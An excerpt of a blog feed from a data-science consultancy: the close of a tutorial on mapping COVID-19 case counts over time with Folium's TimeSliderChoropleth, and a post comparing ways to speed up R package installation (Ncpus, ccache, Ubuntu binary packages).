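&lt;p&gt;As a rough illustration of this structure, the sketch below builds a tiny style dictionary by hand using only the standard library. It assumes dates in MM/DD/YYYY form, interpreted as midnight UTC. The feature ids, colours and the helper &lt;code&gt;to_unix_seconds&lt;/code&gt; are made up for the example; they are not taken from the dataset or from Folium.&lt;/p&gt;

```python
from datetime import datetime, timezone


def to_unix_seconds(date_text):
    """Convert an MM/DD/YYYY date (assumed midnight UTC) to Unix seconds, as a string."""
    moment = datetime.strptime(date_text, "%m/%d/%Y").replace(tzinfo=timezone.utc)
    return str(int(moment.timestamp()))


# Hypothetical records: (feature id, observation date, hex colour)
records = [
    ("0", "01/22/2020", "#ffffcc"),
    ("0", "01/23/2020", "#ffeda0"),
    ("1", "01/22/2020", "#fd8d3c"),
]

example_styledict = {}
for feature_id, date_text, colour in records:
    # One inner dictionary per feature, keyed by timestamp
    per_feature = example_styledict.setdefault(feature_id, {})
    per_feature[to_unix_seconds(date_text)] = {"color": colour, "opacity": 0.7}

print(example_styledict["0"])
```

&lt;p&gt;Both the feature ids and the timestamps are strings here, mirroring the string keys used for the real style dictionary later in this post.&lt;/p&gt;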
&lt;p&gt;We first have to initialise the map. Folium allows the use of different map tiles. If we do not specify any, it defaults to OpenStreetMap. Here, we will use &lt;code&gt;'cartodbpositron'&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mymap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; folium&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Map(tiles&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;cartodbpositron&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mymap&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save(outfile&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;infinite_scroll.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="400" src="infinite_scroll.html"&gt;&lt;/iframe&gt;
&lt;p&gt;Now we have a map of the world. However, there are a couple of problems: the continents are continually repeated and the map can be panned endlessly from either side. In order to prevent this from happening, we set a minimum zoom and set &lt;code&gt;max_bounds=True&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mymap_fix_boundary &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; folium&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Map(min_zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, max_bounds&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;, tiles&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;cartodbpositron&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mymap_fix_boundary&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save(outfile&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;fix_boundary.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="400" src="fix_boundary.html"&gt;&lt;/iframe&gt;
&lt;p&gt;Much better. You might need to change the value of &lt;code&gt;min_zoom&lt;/code&gt; depending on your platform. Now we define a colour map in terms of the log of the number of confirmed cases:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;max_colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; max(joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;min_colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; min(joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cm&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linear&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;YlOrRd_09&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;scale(min_colour, max_colour)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;colour&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;map(cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next, we construct our style dictionary:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;country_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;country_idx &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; range(len(country_list))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;style_dict &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; country_idx:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    country &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; country_list[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; country]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    inner_dict &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; _, r &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; result&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        inner_dict[r[&lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: r[&lt;span style="color:#a5d6ff"&gt;&amp;#39;colour&amp;#39;&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.7&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    style_dict[str(i)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; inner_dict
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then we need to make a dataframe containing the features for each country:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[[&lt;span style="color:#a5d6ff"&gt;&amp;#39;geometry&amp;#39;&lt;/span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries_gdf &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; gpd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;GeoDataFrame(countries_df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries_gdf &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; countries_gdf&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;drop_duplicates()&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;reset_index()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we create our map and add a colourbar:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;folium.plugins&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; TimeSliderChoropleth
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;slider_map &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; folium&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Map(min_zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, max_bounds&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,tiles&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;cartodbpositron&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;_ &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; TimeSliderChoropleth(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;countries_gdf&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;to_json(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; styledict&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;style_dict,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;add_to(slider_map)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;_ &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cmap&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;add_to(slider_map)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cmap&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;caption &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Log of number of confirmed cases&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;slider_map&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save(outfile&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;TimeSliderChoropleth.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="500" src="TimeSliderChoropleth2.html"&gt;&lt;/iframe&gt;
&lt;p&gt;By the time this blog post is published, this data will more than likely be out of date. For up-to-date information on COVID-19 in your area, the &lt;a href="https://www.who.int/" rel="external"&gt;World Health Organization&lt;/a&gt; and &lt;a href="http://hub.arcgis.com/" rel="external"&gt;hub.arcgis.com&lt;/a&gt; are great places to start. The Washington Post also produced a &lt;a href="https://www.washingtonpost.com/graphics/2020/world/corona-simulator/" rel="external"&gt;great article&lt;/a&gt;, using data simulation to show how social distancing is important in tackling COVID-19.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Faster R package installation</title><link>https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/</link><pubDate>Mon, 23 Mar 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="faster-package-installation"&gt;Faster package installation&lt;/h2&gt;
&lt;p&gt;Every few weeks or so, a tweet pops up asking how to speed up package installation in R.&lt;/p&gt;
&lt;img class="image-center" src="twitter.jpg" style="width:450px; class:image-center"&gt;
&lt;p&gt;Depending on the luck of Twitter, the author may get a few suggestions.&lt;/p&gt;
&lt;p&gt;The bigger picture is that package installation time is starting to become more of an issue for a number of reasons. For example, packages are getting larger and more complex (tidyverse and friends), so installation just takes longer. Or we are using more continuous integration strategies such as &lt;a href="http://travis-ci.org/" rel="external"&gt;Travis&lt;/a&gt; or &lt;a href="https://docs.gitlab.com/ee/ci/" rel="external"&gt;GitLab-CI&lt;/a&gt;, and want quick feedback. Or we are simply updating a large number of packages via &lt;code&gt;update.packages()&lt;/code&gt;. This is a problem we often solve for our clients - optimising their CI/CD pipelines.&lt;/p&gt;
&lt;p&gt;The purpose of this blog post is to pull together a few different methods for tackling this problem. If I’ve missed any, let me know (&lt;a href="https://twitter.com/csgillespie" rel="external"&gt;https://twitter.com/csgillespie&lt;/a&gt;)!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-faster-r-package-installation-rstudio"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="faster-installation-with-ncpus"&gt;Faster installation with Ncpus&lt;/h2&gt;
&lt;p&gt;The first tactic you should use is the &lt;code&gt;Ncpus&lt;/code&gt; argument in &lt;code&gt;install.packages()&lt;/code&gt; and &lt;code&gt;update.packages()&lt;/code&gt;. This installs packages in parallel. It doesn’t speed up an individual package install, but it does allow the dependencies of a package such as tidyverse to install in parallel. Using it is easy; it’s just an additional argument in &lt;code&gt;install.packages()&lt;/code&gt;. So to use six cores, we would simply use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;, Ncpus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When installing a fresh version of the tidyverse and all dependencies, this can give a two-fold speed-up.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Ncpus&lt;/th&gt;
&lt;th&gt;Elapsed (secs)&lt;/th&gt;
&lt;th&gt;Ratio (relative to Ncpus = 6)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;409&lt;/td&gt;
&lt;td&gt;2.26&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;224&lt;/td&gt;
&lt;td&gt;1.24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;196&lt;/td&gt;
&lt;td&gt;1.08&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;181&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Not bad for a simple tweak with no downsides. For further information, see our &lt;a href="https://www.jumpingrivers.com/blog/speeding-up-package-installation/" rel="external"&gt;blog post&lt;/a&gt; from a few years ago.&lt;/p&gt;
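&lt;p&gt;As a quick check on the table above, the Ratio column appears to be each elapsed time divided by the six-core time. That reading is an inference from the numbers rather than something stated with the benchmark, and the variable names below are purely illustrative. A minimal sketch that reproduces the column:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Elapsed times (in seconds) copied from the table above
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ncpus = c(1, 2, 4, 6)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;elapsed = c(409, 224, 196, 181)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Assumed definition: each time divided by the six-core time (the last entry)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ratio = round(elapsed / elapsed[length(elapsed)], 2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data.frame(Ncpus = ncpus, Elapsed = elapsed, Ratio = ratio)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Read this way, most of the gain comes from going from one core to two; the extra cores after that help much less.&lt;/p&gt;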
&lt;p&gt;In short, this is something you should definitely use and add to your &lt;code&gt;.Rprofile&lt;/code&gt;. It would in theory speed up continuous integration pipelines, but only if you have multiple cores available. The free version of Travis only comes with a single core, but if you hook up a multi-core Kubernetes cluster to your CI (we sometimes do this at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;), then you can achieve a large speed-up.&lt;/p&gt;
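&lt;p&gt;A minimal sketch of what such an &lt;code&gt;.Rprofile&lt;/code&gt; entry might look like. It relies on &lt;code&gt;install.packages()&lt;/code&gt; taking its default &lt;code&gt;Ncpus&lt;/code&gt; from the &lt;code&gt;Ncpus&lt;/code&gt; option and on &lt;code&gt;parallel::detectCores()&lt;/code&gt;, which ships with R. The cap of six processes is an arbitrary assumption for illustration, so adjust it to your machine:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# ~/.Rprofile: install packages in parallel by default
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;n_cores = parallel::detectCores()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# detectCores() can return NA, so fall back to a single process
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;if (is.na(n_cores)) n_cores = 1L
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Assumption: never use more than six processes (illustrative cap)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;options(Ncpus = min(n_cores, 6L))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this in place, a plain &lt;code&gt;install.packages(&amp;#34;tidyverse&amp;#34;)&lt;/code&gt; picks up the option, so there is no need to pass &lt;code&gt;Ncpus&lt;/code&gt; on every call.&lt;/p&gt;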
&lt;h2 id="faster-installation-with-ccache"&gt;Faster installation with ccache&lt;/h2&gt;
&lt;p&gt;If you are installing packages from source, i.e. tar.gz files, then most of the installation time is spent on compiling source code, such as C, C++ &amp;amp; Fortran. A few years ago, Dirk Eddelbuettel wrote a great &lt;a href="http://dirk.eddelbuettel.com/blog/2017/11/27/" rel="external"&gt;blog post&lt;/a&gt; on leveraging the &lt;a href="https://ccache.samba.org/" rel="external"&gt;ccache&lt;/a&gt; utility for reducing the compile time step. Essentially, ccache stores the resulting object file created when compiling. If that file is ever compiled again, instead of rebuilding, ccache returns the object code, resulting in a significant speed up. It’s the classic trade-off between memory (caching) and CPU.&lt;/p&gt;
&lt;p&gt;Dirk’s &lt;a href="http://dirk.eddelbuettel.com/blog/2017/11/27/" rel="external"&gt;post&lt;/a&gt; gives clear details on how to implement ccache (so I won’t repeat them). He also compares re-installation times of packages, with RQuantlib going from 500 seconds to a few seconds. However, for ccache to be effective, the source files have to be static. Obviously, when you update an R package things change!&lt;/p&gt;
&lt;p&gt;As an experiment, I downloaded the last seventeen versions of {dplyr} from &lt;a href="https://cran.r-project.org/web/packages/dplyr/" rel="external"&gt;CRAN&lt;/a&gt;. This takes us back to version 0.5.0 from 2016. Next I installed each version in turn, via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Avoid tidyverse packages, as we are messing about with dplyr&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;f &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data&amp;#34;&lt;/span&gt;, full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;elapsed &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;numeric&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(f))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq_along&lt;/span&gt;(f)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elapsed[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;system.time&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(f[i], repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;))[&lt;span style="color:#a5d6ff"&gt;&amp;#34;elapsed&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As all package dependencies have been installed and the source code has already been downloaded, the above code times the installation of {dplyr} alone. If we then implement &lt;strong&gt;ccache&lt;/strong&gt;, we can easily rerun the above code. After a little manipulation we can plot the absolute installation times.&lt;/p&gt;
&lt;img class="image-center" src="timings.png" style="width:550px; class:image-center"&gt;
&lt;p&gt;The first (slightly obvious) takeaway is that there is no speed-up with {dplyr} v0.5.0. This is simply because ccache relies on previous installations. As v0.5.0 is the first version in our study, there is no difference between standard and ccache installations.&lt;/p&gt;
&lt;p&gt;Over the seventeen versions of {dplyr}, we achieved a 24-fold speed-up for three versions, and a more modest two- to four-fold speed-up for a further three versions. Averaged over all seventeen versions, a typical speed-up is around 50%.&lt;/p&gt;
&lt;p&gt;Overall, using ccache is a very effective and easy strategy. It requires a single, simple set-up, and doesn’t require root access. Of course it doesn’t always work, but it never really slows anything down.&lt;/p&gt;
&lt;p&gt;At the start of this section, I mentioned the trade off between memory and CPU. I’ve been using ccache since 2017, and the current cache size is around 6GB. Which on a modern hard drive isn’t much (and I install a lot of packages)!&lt;/p&gt;
&lt;h2 id="using-ubuntu-binaries"&gt;Using Ubuntu Binaries&lt;/h2&gt;
&lt;p&gt;On Linux, the standard way of installing packages is via source and &lt;code&gt;install.packages()&lt;/code&gt;. However, it is also possible to install packages using binary packages. This has two main benefits&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It’s faster - typically a few seconds&lt;/li&gt;
&lt;li&gt;It (usually) solves any horrible dependency problems by installing the necessary dev-libraries.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are using continuous integration, such as GitLab runners, then this is a straightforward step to reduce the package installation time. The key idea is to add an additional binary source to your sources.list file; see, for example, the line in &lt;a href="https://github.com/rocker-org/rocker/blob/master/r-ubuntu/Dockerfile#L27" rel="external"&gt;rocker&lt;/a&gt;. After that, you can install most CRAN packages via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt install r-cran-dplyr
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The one big downside here is that the user requires root access to install an R package, so this solution isn’t suitable in all situations.&lt;/p&gt;
